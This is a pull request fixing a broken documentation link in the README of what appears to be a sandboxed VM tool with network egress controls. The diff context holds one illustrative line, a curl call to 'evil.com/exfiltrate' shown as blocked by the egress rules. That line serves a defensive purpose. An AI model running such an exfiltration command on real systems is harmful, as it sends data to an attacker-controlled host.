### PR TITLE
Fix README network controls doc link

### DIFF
--- a/README.md
+++ b/README.md
@@ -154,7 +154,7 @@ vm.run("curl https://api.openai.com/v1/models")    # allowed
 vm.run("curl https://evil.com/exfiltrate")         # blocked
 ```
 
-See [docs/concepts/network-egress-controls.md](docs/deep-dive/network-egress-controls.md) for how it works under the hood.
+See [docs/concepts/network-egress-controls.md](docs/concepts/network-egress-controls.md) for how it works under the hood.
 
 
 ## Mount host directories


### PR DESCRIPTION
## Summary
- Fix the README Network controls link so it points at the existing docs/concepts/network-egress-controls.md file.

## Verification
- Confirmed docs/concepts/network-egress-controls.md exists and docs/deep-dive/network-egress-controls.md does not.

Docs-only change; no tests run.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Documentation**
  * Updated Network controls documentation reference to reflect current documentation structure.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->